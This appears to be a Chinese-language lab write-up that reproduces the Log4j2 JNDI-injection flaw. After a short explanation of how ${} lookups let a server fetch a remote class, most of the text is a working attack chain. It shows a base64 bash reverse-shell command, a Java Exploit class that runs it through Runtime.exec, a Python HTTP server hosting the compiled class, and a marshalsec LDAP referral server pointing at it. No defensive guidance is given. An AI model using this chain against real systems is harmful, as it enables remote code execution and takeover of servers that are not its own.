log4j2漏洞复现
漏洞原理
log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${sys:java.version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制,就有可能让查询指向任何服务(可能是攻击者部署好的恶意代码)。
攻击者可以利用这一点进行JNDI注入,使得受害者请求远程服务来链接本地对象,在lookup的{}里面构造payload,调用JNDI服务(LDAP)向攻击者提前部署好的恶意站点获取恶意的.class对象,造成了远程代码执行(可反弹shell到指定服务器)。
dnslog验证跳过,直接进入反弹shell步骤
一、使用JNDI-exploit工具一键化反弹shell
命令格式
bash -c {echo,BASE64编码命令}|{base64,-d}|{bash,-i}
在线编码网站
JNDI-Exploit工具搭建JNDI服务器
传参执行
反弹成功
二、使用EXP代码反弹shell
1、先写个java反弹shell的exp。
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
public Exploit(){
try{
Runtime.getRuntime().exec("/bin/bash -c {echo,base64命令}|{base64,-d}|{bash,-i}");
}catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv){
Exploit e = new Exploit();
}
}
3、编译为class
javac Exploit.java
4、搭建web服务,将class放上去
我直接python搭建个临时的
python3 -m http.server 4455
5、搭建LADP服务
使用marshalsec工具快速搭建
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://刚才http服务的地址:端口号/#Exploit" 1389
6、反弹shell
传参、开启监听
